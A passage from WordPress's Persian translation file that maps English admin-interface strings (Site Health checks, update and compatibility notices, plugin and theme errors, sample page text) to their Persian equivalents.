کلی در دسترس نیست. تعدادی خطا در هنگام تعیین اندازه نصب شما ایجاد شدند.','The size cannot be calculated. The directory is not accessible. Usually caused by invalid permissions.'=>'اندازه قابل محاسبه نیست. پوشه در دسترس نیست. معمولا به دلیل سطح دسترسی نامعتبر ایجاد می‌شود.','The directory size calculation has timed out. Usually caused by a very large number of sub-directories and files.'=>'زمان محاسبه اندازه پوشه از دست رفت. معمولا به‌خاطر تعداد زیاد پرونده‌ها و زیرپوشه‌ها اتفاق می‌افتد.','These settings alter where and how parts of WordPress are loaded.'=>'این تنظیمات کجا و چگونه بارگذاری شدن بخش‌های وردپرس را تغییر می‌دهد.','%s item with no issues detected'=>'%s مورد بدون مشکل شناسایی شد','%s recommended improvement'=>'%s بهبود پیشنهادی','The site health check shows information about your WordPress configuration and items that may need your attention.'=>'برسی سلامت سایت اطلاعاتی درباره پیکربندی وردپرس شما و موارد نیازمند توجه را نمایش می‌دهد.','Site Health Status'=>'وضعیت سلامت سایت','Everything is running smoothly here.'=>'اینجا همه چیز به خوبی در حال اجرا هستند.','Great job!'=>'کارت عالی بود!','Secondary menu'=>'فهرست ثانویه','The loopback request to your site completed successfully.'=>'درخواست‌های loopback به سایت شما با موفقیت تکمیل شدند.','The loopback request returned an unexpected http status code, %d, it was not possible to determine if this will prevent features from working as expected.'=>'درخواست حلقه‌بازگشت یک کد وضعیت http غیرمنتظره را بازگشت داد، %d، قابل تعیین نیست که این مورد از اجرای قابلیت‌ها به صورتی که انتظار می‌روند جلوگیری می‌کند.','The loopback request to your site failed, this means features relying on them are not currently working as expected.'=>'درخواست حلقه بازگشت به سایت شما ناموفق بود، این بدان معناست که ویژگی‌های وابسته به آن‌ها در حال حاضر آنطور که انتظار می‌رود کار نمی‌کنند.','No scheduled events exist on this site.'=>'رویداد برنامه‌ریزی شده‌ای در این سایت وجود ندارد.','REST API availability'=>'دردسترس بودن REST API','Loopback request'=>'درخواست Loopback','Debugging enabled'=>'اشکال‌زدایی فعال شد','HTTP Requests'=>'درخواست‌های http','Scheduled events'=>'رویدادهای زمانبندی شده','Secure communication'=>'ارتباطات امن','HTTPS status'=>'وضعیت https','PHP Extensions'=>'افزودنی‌های PHP','Database Server version'=>'نگارش سرور پایگاه‌داده','PHP Version'=>'نگارش PHP','Theme Versions'=>'نگارش پوسته','Plugin Versions'=>'نگارش افزونه','WordPress Version'=>'نگارش وردپرس','The REST API did not process the %s query parameter correctly.'=>'REST API پارامتر کوئری %s را به‌درستی پردازش نمی‌کند.','The REST API did not behave correctly'=>'REST API به درستی کار نکرد','The REST API encountered an unexpected result'=>'REST API با یک نتیجه غیرمنتظره مواجه شد','The REST API encountered an error'=>'REST API با خطایی مواجه شده است','The REST API is one way that WordPress and other applications communicate with the server. For example, the block editor screen relies on the REST API to display and save your posts and pages.'=>'REST API یک راه وردپرس، و نرم‌افزارهای دیگر، برای ارتباط با سرور است. یک نمونه صفحه ویرایشگر بلوک است، که بر این مورد برای نمایش، و ذخیره، برگه‌ها و نوشته‌های شما تکیه می‌کند.','The REST API is available'=>'REST API دردسترس است','HTTP requests are partially blocked'=>'درخواست‌های HTTP تا اندازه‌ای مسدود شدند','HTTP requests are blocked'=>'درخواست‌های HTTP تا اندازه‌ای مسدود شدند','It is possible for site maintainers to block all, or some, communication to other sites and services. If set up incorrectly, this may prevent plugins and themes from working as intended.'=>'امکان مسدود کردن همه، یا برخی، از ارتباطات به دیگر سایت‌ها و سرویس‌ها برای نگه‌دارندگان سایت ممکن است. اگر اشتباها تنظیم شود، ممکن است از کارکرد تعیین شده افزونه‌ها و پوسته‌ها جلوگیری کند.','HTTP requests seem to be working as expected'=>'درخواست‌های HTTP به‌نظر می‌رسد به شکلی که انتظار می‌رفت کار می‌کنند','Your site could not complete a loopback request'=>'سایت شما نمی‌تواند درخواست loopback را کامل کند','Loopback requests are used to run scheduled events, and are also used by the built-in editors for themes and plugins to verify code stability.'=>'درخواست‌های حلقه بازگشت برای اجرای رویدادهای برنامه‌ریزی شده استفاده می‌شوند، همچنین توسط ویرایشگرهای پیش‌فرض پوسته‌ها و افزونه‌ها برای تایید ثبات کد استفاده می‌شوند.','Your site can perform loopback requests'=>'سایت شما می‌تواند درخواست‌های requests را انجام دهد','Background updates may not be working properly'=>'به‎روزرسانی‌های پس‌زمینه شاید به‌درستی کار نکنند','Background updates are not working as expected'=>'به‎روزرسانی‌های پس‌زمینه شاید به شکلی که انتظار می‌رفت کار نکنند','Passed'=>'قبول شد','Background updates ensure that WordPress can auto-update if a security update is released for the version you are currently using.'=>'به‌روزرسانی‌های پس‌زمینه اطمینان حاصل می‌کنند که اگر یک به‌روزرسانی امنیتی برای نگارشی که در حال حاضر استفاده می‌کنید منتشر شده باشد وردپرس می‌تواند خودکار به‌روزرسانی شود.','Background updates are working'=>'به‌روزرسانی‌های پس‌زمینه در حال کار هستند','The scheduled event, %s, failed to run. Your site still works, but this may indicate that scheduling posts or automated updates may not work as intended.'=>'رویداد برنامه‌ریزی‌شده %s، برای اجرا ناموفق بود. سایت شما همچنان کار می‌کند، اما این نشان می‌دهد که پست‌های برنامه‌ریزی‌شده یا به‌روزرسانی‌های خودکار شاید به‌صورت مشخص شده کار نکنند.','A scheduled event has failed'=>'رویداد برنامه‌ریزی‌شده به مشکل خورد','While trying to test your site’s scheduled events, the following error was returned: %s'=>'در حالی‌که سعی شد رویدادهای برنامه‌ریزی شده امتحان شوند، خطاهای زیر بازگشت داده شد: %s','It was not possible to check your scheduled events'=>'بررسی رویداد برنامه‌ریزی‌شده ممکن نیست','Scheduled events are what periodically looks for updates to plugins, themes and WordPress itself. It is also what makes sure scheduled posts are published on time. It may also be used by various plugins to make sure that planned actions are executed.'=>'رویدادهای زمانبندی‌شده به صورت دوره‌ای برای به‌روزرسانی افزونه‌ها، پوسته‌ها و خود وردپرس می‌باشند. همچنین اطمینان حاصل می‌کنند که نوشته‌های زمانبندی‌شده به موقع منتشر می‌شوند. همچنین توسط افزونه‌های مختلف استفاده می‌شود تا اطمینان حاصل شود که اقدامات برنامه ریزی‌شده اجرا می‌شوند .','Scheduled events are running'=>'رویدادهای زمانبندی شده در حال اجرا هستند','Talk to your web host about OpenSSL support for PHP.'=>'با میزبان وب خود در مورد پشتیبانی از OpenSSL در PHP صحبت کنید.','Your site is unable to communicate securely with other services'=>'سایت شما قادر به برقراری ارتباط امن با سایر سرویس‌ها نیست.','Your site can communicate securely with other services'=>'سایت شما می‌تواند به صورت امن با دیگر سرویس‌ها ارتباط برقرار کند','Securely communicating between servers are needed for transactions such as fetching files, conducting sales on store sites, and much more.'=>'ارتباط امن بین سرورها برای معاملاتی مانند گرفتن پرونده، انجام فروش در سایت‌های فروشگاه، و موارد بیشتر مورد نیاز است.','Learn more about why you should use HTTPS'=>'درباره این که چرا باید از https استفاده کنید بیشتر بدانید','Your website does not use HTTPS'=>'وب سایت شما از HTTPS استفاده نمی‌کند','Your website is using an active HTTPS connection'=>'وب‌سایتتان در حال استفاده از یک ارتباط HTTPS فعال است.','You are accessing this website using HTTPS, but your Site Address is not set up to use HTTPS by default.'=>'شما با استفاده از HTTPS به این وب سایت دسترسی دارید، اما آدرس وردپرس شما به طور پیش‌فرض برای HTTPS استفاده نمی‌شود.','Your site is set to display errors to site visitors'=>'سایت شما تنظیم شده است که خطاها را به بازدیدکنندگان سایت نمایش دهد','The value, %s, has been added to this website’s configuration file. This means any errors on the site will be written to a file which is potentially available to all users.'=>'مقدار %s، به پرونده پیکربندی این وب‌سایت اضافه شد. به معنای این است که هر خطایی در این سایت رخ دهد در پک پرونده که به‌طور بالقوه در دسترس همه کاربران است نوشته می‌شود.','Your site is set to log errors to a potentially public file'=>'سایت شما جهت گزارش‌کردن خطاها در یک فایل با حالت عمومی تنظیم شده است','Debug mode is often enabled to gather more details about an error or site failure, but may contain sensitive information which should not be available on a publicly available website.'=>'حالت اشکال‌زدایی بیشترمواقع برای جمع‌آوری جزییات بیشتر درباره یک خطا یا خرابی سایت فعال می‌شود، اما ممکن است حاوی اطلاعات حساسی باشد که نباید در سایت عمومی در دسترس باشد. ','Your site is not set to output debug information'=>'سایت شما برای خروج اطلاعات اشکال‌زدایی تنظیم نشده است','Your site is unable to reach WordPress.org at %1$s, and returned the error: %2$s'=>'سایت شما قادر به دسترسی WordPress.org در %1$s نیست، و خطایی برمی‌گرداند: %2$s','Could not reach WordPress.org'=>'عدم توانایی در دسترسی به WordPress.org','Communicating with the WordPress servers is used to check for new versions, and to both install and update WordPress core, themes or plugins.'=>'برقراری ارتباط با سرورهای وردپرس برای بررسی نگارش‌های جدید، و نصب و به‌روزرسانی هسته، پوسته‌ها یا افزونه‌های وردپرس استفاده می‌شود.','Can communicate with WordPress.org'=>'با WordPress.org می‌توان ارتباط برقرار کرد.','WordPress requires %1$s version %2$s or higher. Contact your web hosting company to correct this.'=>'وردپرس نیازمند %1$s نگارش %2$s یا بالاتر است. با شرکت میزبان وب خود برای اصلاح این مورد تماس بگیرید.','Severely outdated SQL server'=>'SQL server به شدت قدیمی است.','For optimal performance and security reasons, you should consider running %1$s version %2$s or higher. Contact your web hosting company to correct this.'=>'برای عملکرد بهینه و دلایل امنیتی، باید در نظر بگیرید که %1$s نگارش %2$s یا بالاتر را اجرا نمایید. با شرکت میزبان وب خود برای اصلاح این مورد تماس بگیرید.','Outdated SQL server'=>'SQL server قدیمی است.','SQL server is up to date'=>'سرور SQL به‌روز است','One or more required modules are missing'=>'یک یا چند ماژول موردنیاز وجود ندارند.','One or more recommended modules are missing'=>'یک یا چند ماژول پیشنهادی وجود ندارند.','The optional module, %s, is not installed, or has been disabled.'=>'ماژول اختیاری، %s، نصب نشده، یا غیرفعال شده است.','The required module, %s, is not installed, or has been disabled.'=>'ماژول ضروری، %s، نصب نشده، یا غیرفعال شده است.','Error'=>'خطا','Required and recommended modules are installed'=>'ماژول‌های پیشنهادی و موردنیاز نصب شده‌اند.','Your site does not have any default theme. Default themes are used by WordPress automatically if anything is wrong with your chosen theme.'=>'سایت شما هیچ پوسته پیش‌فرضی ندارد. اگر پوسته انتخابی شما به مشکل بخورد پوسته پیش‌فرض به‌صورت خودکارتوسط وردپرس استفاده می‌شود.','Have a default theme available'=>'یک پوسته پیش‌فرض دردسترس داشته باشید','To enhance your site’s security, you should consider removing any themes you are not using. You should keep %1$s, the default WordPress theme, %2$s, your active theme, and %3$s, its parent theme.'=>'برای افزایش امنیت سایتتان، باید در نظر بگیرید که همه پوسته‌هایی که استفاده نشده را پاک کنید. شما باید %1$s، پوسته پیش‌فرض وردپرس، %2$s، پوسته فعلی شما، و %3$s، پوسته مادر را نگه‌دارید.','To enhance your site’s security, you should consider removing any themes you are not using. You should keep your active theme, %1$s, and %2$s, its parent theme.'=>'برای افزایش امنیت سایتتان، پیشنهاد می‌کنیم همه پوسته‌هایی که استفاده نشده را پاک کنید. شما باید پوسته فعلی‌تان، %1$s، و %2$s، پوسته مادر را نگه‌دارید.','You should remove inactive plugins'=>'شما باید افزونه‌های غیر فعال را پاک کنید','Your site has %d installed theme, and it is up to date.'=>'سایت شما %d پوسته نصب شده دارد، و همه آنها به‌روز هستند.','Your site has %d theme waiting to be updated.'=>'سایت شما %d پوسته منتظر به‌روزرسانی دارد.','You have themes waiting to be updated'=>'شما پوسته‌هایی منتظر به‌روزرسانی دارید','Themes add your site’s look and feel. It’s important to keep them up to date, to stay consistent with your brand and keep your site secure.'=>'پوسته‌ها به سایت شما حس و ظاهر می‌بخشند. به‌روز نگه‌داشتن آنها مهم است، تا نام تجاری شما استوار و سایت شما امن باقی بماند.','Your themes are all up to date'=>'پوسته‌های شما به‌روز هستند','Your site has %d active plugin, and it is up to date.'=>'سایت شما %d افزونه فعال دارد، و همه آنها به‌روز هستند.','Your site has %d plugin waiting to be updated.'=>'سایت شما%d پلاگین در حال انتظار برای به روز رسانی است.','You have plugins waiting to be updated'=>'شما افزونه‌هایی منتظر به‌روزرسانی دارید','Plugins extend your site’s functionality with things like contact forms, ecommerce and much more. That means they have deep access to your site, so it’s vital to keep them up to date.'=>'افزونه‌ها قابلیت سایت شما را با چیزهایی شبیه فرم‌های نماس، تجارت الکترونیک و موارد بیشتر گسترش می‌دهند. این بدان معناست که آنها دسترسی عمیقی به سایت شما دارند، پس به‌روز نگه‌داشتن آنها حیاتی است.','Your plugins are all up to date'=>'افزونه‌های شما به‌روز هستند','You are currently running the latest version of WordPress available, keep it up!'=>'شما درحال‌حاصر آخرین نگارش در دسترس وردپرس را دارید، آ‌ن‌را نگه‌دارید!','A new minor update is available for your site. Because minor updates often address security, it’s important to install them.'=>'یک به‌روزرسانی کوچک برای سایتتان در دسترس است.به دلیل اینکه به‌روزرسانی‌های کوچک معمولا امنیتی هستند، نصب آنها مهم است.','A new version of WordPress is available.'=>'یک نگارش تازه از وردپرس دردسترس است.','Install the latest version of WordPress'=>'آخرین نگارش وردپرس را نصب نمایید','WordPress update available (%s)'=>'به‌روزرسانی وردپرس دردسترس است (%s)','Check for updates manually'=>'بررسی دستی به‌روزرسانی‌ها','Unable to check if any new versions of WordPress are available.'=>'نمی‌توان بررسی کرد که آیا نگارش جدیدی از وردپرس در دسترس است.','WordPress security and maintenance releases are blocked by the %s filter.'=>'نسخه‌های امنیتی و نگه‌داری وردپرس توسط فیلتر %s مسدود شده‌اند.','WordPress security and maintenance releases are blocked by %s.'=>'نسخه‌های امنیتی و نگه‌داری وردپرس توسط %s مسدود شده‌اند.','WordPress development updates are blocked by the %s filter.'=>'به‌روزرسانی‌های توسعه وردپرس توسط فیلتر %s مسدود شده‌اند.','WordPress development updates are blocked by the %s constant.'=>'به‌روزرسانی‌های توسعه وردپرس توسط ثابت %s مسدود شده‌اند.','All of your WordPress files are writable.'=>'همه پرونده‌های وردپرس قابل نوشتن هستند.','Some files are not writable by WordPress:'=>'برخی از پرونده‌ها توسط وردپرس قابل نوشتن نیستند:','This could mean that connections are failing to WordPress.org.'=>'این می‌تواند به این معنا باشد که اتصالات به WordPress.org شکست خورده‌اند.','Couldn\'t retrieve a list of the checksums for WordPress %s.'=>'فهرستی از چکسام‌ها برای وردپرس %s قابل بازیابی نیست.','Your installation of WordPress does not require FTP credentials to perform updates.'=>'نصب وردپرس شما نیاز به مجوز FTP برای انجام به‌روزرسانی‌ها ندارد.','(Your site is performing updates over FTP due to file ownership. Talk to your hosting company.)'=>'(سایت شما به‌روزرسانی‌ها را به دلیل مالکیت فایل برروی FTP انجام می‌دهد. با شرکت میزبان خود صحبت کنید.)','Your installation of WordPress prompts for FTP credentials to perform updates.'=>'نصب وردپرس از شما مشخصات FTP را می‌خواهد تا به‌روزرسانی‌ها را انجام دهد.','No version control systems were detected.'=>'هیچ سیستم نظارت نگارشی (Version Control) تشخیص داده نشد.','The folder %1$s was detected as being under version control (%2$s).'=>'پوشه %1$s به عنوان تحت کنترل نسخه شناسایی شد (%2$s).','The folder %1$s was detected as being under version control (%2$s), but the %3$s filter is allowing updates.'=>'پوشه %1$s به عنوان تحت کنترل نسخه شناسایی شد (%2$s)، اما صافی %3$s اجازه به‌روزرسانی‌ها را می‌دهد.','A previous automatic background update could not occur.'=>'یک به‌روزرسانی زمینه خودکار قبلی نتوانست انجام شود.','The error code was %s.'=>'کد خطا %s بود.','When you\'ve been able to update using the "Update now" button on Dashboard > Updates, this error will be cleared for future update attempts.'=>'هنگامی‌که شما قادر به به‌روزرسانی با استفاده از دکمه "هم‌اکنون به‌روزرسانی نمایید" در پیشخوان > به‌روزرسانی‌ها بودید، ما این خطا را برای تلاش‌های به‌روزرسانی آینده پاک خواهیم نمود.','You would have received an email because of this.'=>'به این دلیل، یک ایمیل دریافت کرده‌اید.','A previous automatic background update ended with a critical failure, so updates are now disabled.'=>'به‌روزرسانی پس‌زمینه خودکار قبلی با یک شکست بحرانی پایان یافت، بنابراین به‌روزرسانی‌ها هم‌اکنون غیرفعال شد‌ه‌اند.','The %s filter is enabled.'=>'صافی %s فعال شد.','A plugin has prevented updates by disabling %s.'=>'یک افزونه با غیرفعالسازی %s از به‌روزرسانی جلوگیری نمود.','The must use plugins directory'=>'پوشه افزونه‌های بیشتر استفاده شده','Theme features'=>'ویژگی‌های پوسته','Parent theme'=>'پوسته مادر','Author website'=>'سایت نویسنده','(Latest version: %s)'=>'(آخرین نگارش: %s)','Version %1$s by %2$s'=>'نگارش %1$s توسط %2$s','No version or author information is available.'=>'اطلاعات نگارش یا نویسنده در دسترس نیست.','Server version'=>'نگارش سرور','Your %s file contains only core WordPress features.'=>'پرونده %s شما فقط حاوی ویژگی‌های هسته وردپرس است.','Custom rules have been added to your %s file.'=>'قوانین سفارشی به پرونده %s شما اضافه شده است.','.htaccess rules'=>'قوانین .htaccess','Is the Imagick library available?'=>'آیا کتابخانه Imagick دردسترس است؟','Is SUHOSIN installed?'=>'آیا SUHOSIN نصب شده‌ است؟','cURL version'=>'نگارش cURL','PHP post max size'=>'حداکثر اندازه نوشته PHP','Upload max filesize'=>'حداکثر اندازه پرونده آپلود','Max input time'=>'حداکثر زمان ورودی','PHP memory limit'=>'محدوده حافظه PHP','PHP time limit'=>'محدودیت زمانی PHP','PHP max input variables'=>'بیشترین مقدار متغیرهای ورودی PHP','Unable to determine some settings, as the %s function has been disabled.'=>'قادر نیستیم تا برخی تنظیمات را مشخص کنیم، چون تابع %s غیرفعال شده است.','Server settings'=>'تنظیمات سرور','PHP SAPI'=>'PHP SAPI','(Does not support 64bit values)'=>'(مقدار ۶۴ بیتی پشتیبانی نمی‌شود)','(Supports 64bit values)'=>'(پشتیبانی از مقدار ۶۴ بیتی)','PHP version'=>'نگارش php','Unable to determine what web server software is used'=>'تعیین اینکه چه نرم‌افزار وب سروری در حال استفاده است امکان پذیر نیست','Web server'=>'سرور وب','Unable to determine server architecture'=>'تعیین معماری سرور امکان پذیر نیست','Server architecture'=>'معماری سرور','Ghostscript version'=>'نگارش Ghostscript','Unable to determine if Ghostscript is installed'=>'تعیین اینکه Ghostscript نصب شده امکان پذیر نیست','GD version'=>'نگارش GD','Imagick Resource Limits'=>'محدودیت‌های منابع Imagick','ImageMagick version string'=>'رشته نگارش ImageMagick','ImageMagick version number'=>'شماره نگارش ImageMagick','Active editor'=>'ویرایشگر فعال','Total installation size'=>'جمع اندازه نصب','Database size'=>'اندازه پایگاه‌داده','WordPress directory size'=>'اندازه پوشه وردپرس','WordPress directory location'=>'مکان پوشه وردپرس','Plugins directory size'=>'اندازه پوشه افزونه‌ها','Plugins directory location'=>'مکان پوشه افزونه‌ها','Themes directory size'=>'اندازه پوشه پوسته‌ها','Theme directory location'=>'مکان پوشه پوسته‌ها','Uploads directory size'=>'اندازه پوشه بارگذاری‌ها','Uploads directory location'=>'مکان پوشه بارگذاری‌ها','Unable to reach WordPress.org at %1$s: %2$s'=>'امکان دسترسی به WordPress.org در %1$s نیست: %2$s','WordPress.org is reachable'=>'WordPress.org قابل دسترسی است','Communication with WordPress.org'=>'ارتباط با WordPress.org','Network count'=>'تعداد شبکه','Site count'=>'تعداد سایت','User count'=>'تعداد کاربر','The themes directory'=>'پوشه پوسته‌ها','The plugins directory'=>'پوشه افزونه‌ها','The uploads directory'=>'پوشه بارگذاری‌ها','The wp-content directory'=>'پوشه wp-content','Not writable'=>'قابل نوشتن نیست','Writable'=>'قابل نوشتن','The main WordPress directory'=>'پوشه اصلی وردپرس','Shows whether WordPress is able to write to the directories it needs access to.'=>'نشان می‌دهد که آیا وردپرس قادر به نوشتن در پوشه‌هایی که نیاز به دسترسی دارد است.','Filesystem Permissions'=>'دسترسی‌های پرونده‌های سیستمی','Undefined'=>'تعریف نشده','WordPress Constants'=>'ثابت‌های وردپرس','Database'=>'پایگاه‌داده','The options shown below relate to your server setup. If changes are required, you may need your web host’s assistance.'=>'گزینه‌های نشان داده‌شده زیر مربوط به نصب سرور شما هستند. اگر تغییراتی نیاز است، شاید شما به کمک میزبان وب خود نیاز دارید.','Server'=>'سرور','Media Handling'=>'اداره رسانه','Inactive Plugins'=>'افزونه‌های غیر فعال','Active Plugins'=>'افزونه‌های فعال','Must Use Plugins'=>'باید از افزونه‌ها استفاده نمایید','Active Theme'=>'پوسته فعال','Drop-ins'=>'جایگزین‌ها','Directories and Sizes'=>'اندازه‌ها و پوشه‌ها','Is this a multisite?'=>'آیا این یک چندسایتی است؟','Default comment status'=>'وضعیت دیدگاه پیش‌فرض','Can anyone register on this site?'=>'آیا هر فردی می‌تواند در این سایت نام‌نویسی کند؟','Is this site using HTTPS?'=>'آیا این سایت از HTTPS استفاده می‌کند؟','No permalink structure set'=>'ساختار پیوند یکتا تنظیم نشده است','Permalink structure'=>'ساختار پیوندیکتا','Site URL'=>'نشانی اینترنتی سایت','Home URL'=>'نشانی اینترنتی خانه','Site Health'=>'سلامت سایت','requestsAll (%s)'=>'همه (%s)','Show comments cookies opt-in checkbox, allowing comment author cookies to be set'=>'نمایش جعبه انتخاب کوکی‌های دیدگاه‌ها، اجازه برای تنظیم کوکی‌های نویسنده دیدگاه.','Next theme'=>'پوسته بعدی','Previous theme'=>'پوسته قبلی','If you change this, an email will be sent at your new address to confirm it. The new address will not become active until confirmed.'=>'در صورتی که شما این را تغییر دهید، ما یک ایمیل به نشانی جدید شما جهت تایید آن، ارسال خواهیم کرد.نشانی جدید تا زمان تایید، فعال نخواهد شد.','Theme resumed.'=>'پوسته از سرگرفته شد.','Theme could not be resumed because it triggered a fatal error.'=>'پوسته قادر به ازسرگیری نشد زیرا باعث شد تا خطای وخیمی رخ دهد.','If you notice “headers already sent” messages, problems with syndication feeds or other issues, try deactivating or removing this plugin.'=>'اگر پیام اخطار “headers already sent” ، مشکلات مربوط به خوراک‌های پیوند یا مسائل دیگر را دریافت کردید، این افزونه را غیرفعال یا حذف کنید.','The plugin generated %d character of unexpected output during activation.'=>'این افزونه %d حرف از خروجی غیرمنتظره در طول فعال‌سازی تولید کرد.','Sorry, you are not allowed to resume this plugin.'=>'با عرض پوزش، شما مجاز به از سر گیری این افزونه نیستید.','WordPress Events and News — Upcoming events near you as well as the latest news from the official WordPress project and the WordPress Planet.'=>'خبرها و رویدادهای وردپرس — رویدادهای آینده نزدیک شما همچنین جدیدترین خبرها از پروژه رسمی وردپرس و سیاره وردپرس.','You cannot update because WordPress %2$s requires MySQL version %3$s or higher. You are running version %4$s.'=>'شما نمی‌توانید به‌روزرسانی نمایید زیرا وردپرس %2$s نیازمند MySQL نگارش %3$s یا بالاتر است. شما در حال اجرا بر روی MySQL نگارش %4$s می‌باشید.','You cannot update because WordPress %2$s requires PHP version %3$s or higher. You are running version %4$s.'=>'شما نمی‌توانید به‌روزرسانی نمایید زیرا وردپرس %2$s نیازمند PHP نگارش %3$s یا بالاتر است. شما در حال اجرا بر روی PHP نگارش %4$s می‌باشید.','Add menu items'=>'افزودن گزینه‌های فهرست','or create a new menu. Do not forget to save your changes!'=>'یا یک فهرست جدید ایجاد نمایید. فراموش نکنید که تغییراتتان را ذخیره نمایید!','Click the Save Menu button to save your changes.'=>'جهت ذخیره تغییراتتان، دکمه ذخیره فهرست را کلیک نمایید.','Edit your menu below, or create a new menu. Do not forget to save your changes!'=>'فهرست خود را در زیر ویرایش نمایید، یا یک فهرست جدید ایجاد نمایید. فراموش نکنید که تغییرات خود را ذخیره نمایید!','Fill in the Menu Name and click the Create Menu button to create your first menu.'=>'نام فهرست را پر نمایید و دکمه ایجاد فهرست را جهت ایجاد اولین فهرست خود، کلیک نمایید.','Create your first menu below.'=>'اولین فهرست خودتان را در زیر ایجاد کنید.','You cannot install because WordPress %2$s requires MySQL version %3$s or higher. You are running version %4$s.'=>'وردپرس نمی‌تواند نصب شود زیرا وردپرس %2$s نیازمند MySQL نگارش %3$s یا بالاتر است. شما در حال اجرا بر روی MySQL نگارش %4$s می‌باشید. ','You cannot install because WordPress %2$s requires PHP version %3$s or higher. You are running version %4$s.'=>'وردپرس نمی‌تواند نصب شود زیرا وردپرس %2$s نیازمند PHP نگارش %3$s یا بالاتر است. شما در حال اجرا بر روی PHP نگارش %4$s می‌باشید. ','Learn more about updating PHP'=>'اطلاعات بیشتر درباره به‌روزرسانی PHP','What is PHP and how does it affect my site?'=>'PHP چیست و چگونه بر روی سایت من تاثیر می‌گذارد؟','PHP Update Required'=>'به‌روزرسانی PHP ضروری است','You can find more details and make changes on the Plugins screen.'=>'شما می‌توانید جزئیات بیشتری بیابید و تغییراتی در صفحه افزونه‌ها انجام دهید.','One or more plugins failed to load properly.'=>'یک یا چند افزونه جهت بارگذاری صحیح ناموفق شدند.','Could not resume the plugin.'=>'عدم توانایی در از سرگیری افزونه.','Custom PHP fatal error handler.'=>'رسیدگی کننده (Handler) خطای وخیم سفارشی PHP.','Custom PHP error message.'=>'پیغام خطای PHP سفارشی.','Could not remove the old translation.'=>'عدم توانایی در حذف ترجمه قدیمی.','Removing the old version of the translation…'=>'حذف نگارش قدیمی ترجمه…','Click here to update WordPress.'=>'جهت به‌روزرسانی وردپرس اینجا را کلیک نمایید.','Error: This plugin requires a newer version of WordPress.'=>'خطا: این افزونه نیاز به نگارش جدیدتری از وردپرس دارد.','Click here to learn more about updating PHP.'=>'جهت یادگیری بیشتر درباره به‌روزرسانی PHP اینجا را کلیک نمایید.','Error: This plugin requires a newer version of PHP.'=>'خطا: این افزونه نیاز به یک نگارش جدیدتر از PHP دارد.','Add widget: %s'=>'افزودن ابزارک: %s','Add to: %s'=>'افزودن به: %s','Track %s.'=>'ترک %s.','My Network'=>'شبکه من','This plugin does not work with your version of PHP.'=>'این افزونه با نگارش PHP شما کار نمی‌کند.','This plugin does not work with your version of WordPress.'=>'این افزونه با نگارش وردپرس شما کار نمی‌کند.','This plugin does not work with your versions of WordPress and PHP.'=>'این افزونه با نگارش‌های وردپرس و PHP شما کار نمی‌کند.','https://wordpress.org/documentation/wordpress-version/version-%s/'=>'https://wordpress.org/documentation/wordpress-version/version-%s/','Resume'=>'ازسرگرفتن','pluginResume %s'=>'ازسرگرفتن %s','You can find more details and make changes on the Themes screen.'=>'شما می‌توانید جزئیات بیشتری بیابید و تغییراتی در صفحه پوسته‌ها ایجاد نمایید.','One or more themes failed to load properly.'=>'یک یا چند پوسته جهت بارگذاری درست ناموفق شدند.','Could not resume the theme.'=>'عدم توانایی در از سرگرفتن پوسته.','Deleting a category does not delete the posts in that category. Instead, posts that were only assigned to the deleted category are set to the default category %s. The default category cannot be deleted.'=>'حذف یک دسته باعث حذف نوشته‌های آن دسته نمی‌شود. درعوض، نوشته‌هایی که فقط به دسته حذف شده اختصاص داده شده بودند بر روی دسته پیش‌فرض %s تنظیم شده‌اند. دسته پیش‌فرض را نمی‌توان حذف کرد.','The block widgets require JavaScript. Please enable JavaScript in your browser settings, or install the Classic Widgets plugin.'=>'ویرایشگر بلوک نیازمند جاوااسکریپت است. لطفا جاوااسکریپت را در تنظیمات مرورگر خود فعال نمایید، یا افزونه ویرایشگر کلاسیک را امتحان نمایید.','A post type mismatch has been detected.'=>'یک ناهمسانی نوع نوشته شناسایی شده است.','A post ID mismatch has been detected.'=>'یک ناهمسانی شناسه نوشته شناسایی شده است.','Please open the classic editor to use this meta box.'=>'لطفا ویرایشگر کلاسیک را باز کنید تا از این جعبه متا استفاده کنید.','Please activate the Classic Editor plugin to use this meta box.'=>'لطفا افزونه ویرایشگر کلاسیک را فعال کنید تا از این جعبه متا استفاده کنید.','Please install the Classic Editor plugin to use this meta box.'=>'لطفا افزونه ویرایشگر کلاسیک را نصب کنید تا از این جعبه متا استفاده کنید.','This meta box is not compatible with the block editor.'=>'این جعبه متا با ویرایشگر بلوک سازگار نیست.','To distribute copies of your modified versions to others.'=>'برای توزیع ویرایش‌هایی از نسخه‌های اصلاح شده خود به دیگران.','The 4th Freedom'=>'چهارمین آزادی','To redistribute.'=>'برای توزیع مجدد.','The 3rd Freedom'=>'سومین آزادی','To study how the program works and change it to make it do what you wish.'=>'برای مطالعه نحوه کارکرد برنامه و تغییر آن به آنچه شما می‌خواهید.','The 2nd Freedom'=>'دومین آزادی','To run the program for any purpose.'=>'برای اجرای برنامه برای هر هدفی.','The 1st Freedom'=>'نخستین آزادی','Created'=>'ایجاد شد','Welcome to WordPress. This is your first post. Edit or delete it, then start writing!'=>'به وردپرس خوش آمدید. این اولین نوشتهٔ شماست. این را ویرایش یا حذف کنید، سپس نوشتن را شروع نمایید!','As a new WordPress user, you should go to your dashboard to delete this page and create new pages for your content. Have fun!'=>'به عنوان یک کاربر جدید وردپرس، برای حذف این برگه و ایجاد برگه‌های جدید برای محتوای خود شما باید به پیشخوان بروید. خوش بگذره!','The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.'=>'شرکت XYZ در سال ۱۹۷۱ تأسیس شد، و تا کنون چیزهای با کیفیتی را به عموم عرضه کرده است. این شرکت در شهر گاتهام واقع شده است، بیش از ۲۰۰۰ نفر در آن کار می‌کنند و همه نوع چیز عالی برای جامعه گاتهام انجام می‌دهد.','...or something like this:'=>'...یا چیزهایی مانند این:','Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)'=>'سلام! من یک پیام‌رسان دوچرخه‌سوار در روز، بازیگر مشتاق در شب هستم، و این وب‌سایت من است. من در لس آنجلس زندگی می‌کنم، یک سگ بزرگ به نام جک دارم، و من پینیا کولادا دوست دارم. (همچنین گرفتار شدن در باران را دوست دارم.)','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:'=>'این یک برگهٔ نمونه است. این از یک نوشتهٔ وبلاگ متفاوت است زیرا در یک مکان باقی 